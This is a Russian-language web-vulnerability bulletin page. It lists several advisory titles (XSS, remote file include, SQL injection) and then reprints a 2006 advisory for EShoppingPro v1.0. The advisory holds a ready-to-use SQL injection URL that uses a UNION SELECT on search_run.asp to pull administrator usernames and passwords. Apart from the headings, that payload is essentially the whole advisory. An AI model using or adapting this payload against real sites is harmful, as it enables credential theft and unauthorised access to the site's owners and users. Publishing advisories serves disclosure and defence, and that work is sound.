Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

BizDirectory all version xss

PhotoPost PHP  4.6 - 4.5 [PP_PATH] >> Remote File Include Vulnerability

Sql injection in Moodle

MyBB 1.2 Full path and Cross site scripting vulnerabilities

From:	ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:	19 сентября 2006 г.
Subject:	EShoppingPro v1.0(search_run.asp) Remote SQL Injection Vulnerability

Vulnerability Report
*******************************************************************************
# Title  :  EShoppingPro v1.0(search_run.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Script Page : http://www.keyvan1.com

# Exploit;

*******************************************************************************

###http://[target]/[path]/search_run.asp?keyword=-1&category=-
1&order='%20union%20select%200,0,0,Username,Password,0,0,0,0,
0,0,0,0,0,0,0,0,0%20from%20admin&x=-1&y=-1


# ajann,Turkey
# ...